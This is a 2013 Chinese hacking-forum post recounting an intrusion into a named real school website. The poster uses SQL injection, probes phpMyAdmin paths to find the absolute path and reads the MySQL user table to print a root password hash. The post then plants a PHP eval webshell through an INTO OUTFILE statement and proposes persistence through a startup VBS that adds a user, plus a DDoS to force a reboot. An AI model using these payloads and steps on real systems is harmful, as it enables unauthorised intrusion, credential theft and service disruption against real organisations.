找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2894|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏6 R" A/ x& V) W( u( d$ S& ?# }% p7 ^
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
, k* S6 u# O/ ?- _0 a
/ {* F/ x: Q, @. I9 k# [
* d! @# A$ h7 j9 ~; `+ I
+ Z. H, N& `- D. H* k" i常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 5 ]: \7 _& @1 f) v8 e4 @6 J

" L/ ~7 R/ R) f: Z那么想可以直接写入shell ,getshell有几个条件:
" Q* I5 l& a- J9 l3 l2 Q" X
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
3 a) D8 q4 M  u& Y8 ^$ m; _
5 \( |) G' A8 t- o3 K! G试着爆绝对路径:, V* ^8 k) R- T  x9 \8 H7 d' J
1./phpMyAdmin/index.php?lang[]=1    ]  g* z2 K& o- X" K) F
2./phpMyAdmin/phpinfo.php  # \  o, d6 Q- ~& `/ u
3./load_file()  
. k7 r2 m4 @8 u4./phpmyadmin/themes/darkblue_orange/layout.inc.php  ' H+ D* ]6 F( B' j1 `/ T; j
5./phpmyadmin/libraries/select_lang.lib.php  
- H4 F6 Y  Z# F; @1 D6./phpmyadmin/libraries/lect_lang.lib.php  
! g% D+ m+ n6 H) b* p1 m' Y7 x  J& K7./phpmyadmin/libraries/mcrypt.lib.php   
( K+ t7 L) ~) n  V7 S& n8./phpmyadmin/libraries/export/xls.php  $ L9 L. H; h# ~/ e" L9 }5 N

+ w' G+ t/ {: w4 `% |均不行...........................' o( N0 b( m5 Y5 D5 m
$ F7 q, C6 W: J" f, F( e" K% i
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
. Z; e; R- C* [  j1 V/ J
3 n. V/ x1 o% T权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# `% m' R6 B/ e$ K7 V, t' N' \
$ l- u, P8 d: o; ?' N* G  S( A默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败# t5 e% C% v  X, q& q" E
, r, U4 Q8 ~4 z* n/ e; c
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........5 G! I4 {' x( ^3 U* K( L2 q* I! T
0 c" L/ P  j) ]9 \( }8 S1 j  p8 ^
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 2 I8 I- m  N8 M

3 N% Q' Q# F( k$ }9 b# ihttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
( \0 d: \) ~  T- V; }. w) v4 {
* v4 F' [$ y6 W  z  t8 `: {自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 }7 j! x: w% P% V. p
) U% o6 B5 S' Z  m9 s
成功读到root密码:
9 @. w/ {6 s5 F3 A3 b: I8 Q3 z6 J8 {4 W4 l8 {& \
17---- r(0072)
, c8 H; X6 E' |* h7 @18---- o(006f)
9 q/ r0 v" Z# _$ n* P5 |; ~' L19---- o(006f)
  a" i  H+ k# c! c3 ]20---- t(0074)
& m+ q) h% @! N- X21---- *(002a)) y* m. G, a+ p: g( N  U" {
22---- 8(0038)
6 P/ u' ]/ g4 V+ C1 f0 j23---- 2(0032)" @% Y) H( @$ [! ~# p
24---- E(0045)
5 P  |2 d8 S! O25---- 1(0031); l9 e- d9 K! n1 g0 \% L! x7 h
26---- C(0043)0 J3 Z' P( ?- F: R5 c7 Q9 j
27---- 5(0035)- q! Z4 R" Q8 A/ j9 t
28---- 8(0038)
2 x1 e4 B3 Z* _" y! |( G) b29---- 2(0032)( q7 N- g$ x' t/ r5 q; a
30---- 8(0038)  C8 w; A" `' S& ^! G0 I' {. _+ Y/ E
31---- A(0041)9 Y* Q& a3 W  d/ a. K' O, v) h
32---- 9(0039)  T, }4 J, L3 B# n; w
33---- B(0042)
, Z6 X, [' t* I- l8 `8 L1 w5 _, u34---- 5(0035)- h  `$ v6 w" x9 m
35---- 4(0034)
2 ?. |  L" t; J36---- 8(0038)9 H, p4 Q* q3 q  ^7 B& `
37---- 6(0036)' r4 T& \, O# k
38---- 4(0034)
4 ^$ r! I8 ~3 s6 x" W6 u. r" Z; v39---- 9(0039)3 F1 K& x  n1 I9 ~8 W1 P' c+ h( d
40---- 1(0031)0 ?& R; J9 ?1 x% x. h  S1 y7 m
41---- 1(0031); N6 b$ q+ f/ a9 X+ M7 N! i4 h! W
42---- 5(0035)
0 v# k% ]+ |" n  H43---- 3(0033)
/ J' @8 S& O2 o: p44---- 5(0035), [7 Z0 A2 j5 P9 E8 b
45---- 9(0039)
$ y: t( R3 X  m: D; f9 E/ L46---- 8(0038)' _5 ^. U  Q/ `1 U7 X+ W
47---- F(0046)
1 J9 y& Y" Y3 x: v' M" w48---- F(0046)
' f$ n. w1 q5 o6 [; O49---- 4(0034)0 [) z! q# u3 Q4 {1 G0 _# b+ o3 }
50---- F(0046)
% p' A" x2 l3 q- `$ n51---- 0(0030)
8 m# O& C: {2 j  W" b# O, {52---- 3(0033)" w* W, K$ p, n* t8 ^% A5 X
53---- 2(0032)
# h! s$ Z! g4 J& _) _54---- A(0041)
7 T% M6 N( O; M' I) j: d2 g55---- 4(0034)
; c7 x) B* ]' X. G' P9 k56---- A(0041)
! n! J8 [5 K3 U& }2 o! j& q57---- B(0042)
4 i' l% N' ]" k! g0 P% d58---- *(0044)* h+ b: ]. Z4 `* ~  o3 m* p
59---- *(0035)
4 s) Z" r, q; y, I60---- *(0041)
- N" R, s% ^, F9 Y61---- *0032)5 Y7 K3 _- Q( W

4 b' [9 I/ D8 {6 \# A2 S& K解密后成功登陆phpmyamin" Z* t0 h6 ~8 a, O! j
                          
/ Z8 {, x5 D/ d
6 ]" H5 P, r( B* p  |                             
8 O  m6 t. l* a' _; {4 \$ h1 l/ h$ D5 z" i. ]' m$ w
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 ^. c  A9 @, V2 w
5 p" o1 L5 Z4 O6 f7 \成功执行,拿下shell,菜刀连接:8 Z. r0 l2 ^5 U  a! n
; Y5 g+ r4 [: Y& i3 o$ H
服务器不支持asp,aspx,php提权无果...................
  K( }9 K; @" M8 K6 c9 U% R
: N9 Y% k4 q; I+ {" v但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:; K# e+ d( B6 C) q
服务器上已经有个隐藏帐号了

) L+ c8 f8 P& V0 `7 z) c) B
别名     administrators
0 U% G7 F9 c9 \; a# S注释     管理员对计算机/域有不受限制的完全访问权
: [  D' F' |) C2 V4 p* l. ^
成员

+ R! C% h8 G6 y, ~0 k1 D
-------------------------------------------------------------------------------0 u5 w) A( D8 f5 i. T8 M
admin
' n5 U1 U; Z0 C" |, k( cAdministrator
2 y) s" k8 f! c1 u, Sslipper$
' [7 H% ?* l" B' H: Dsqluser
* ?+ F* w4 M4 h6 L8 }* v) @命令成功完成。
4 y' g8 o3 [; J8 g+ C) K) U- E: s! g( U5 [- _& h# l
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
. O) `; ]) j" L* {6 m8 D* m0 z  Z: @' ^% U) [
ddos服务器重启,不然就只能坐等服务器重启了...............................
) @& d- e, A" s. t# A* y0 u# t4 A" I1 t: y% H' u& c! _& W
      
$ u% {# R' v5 e1 t2 A

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表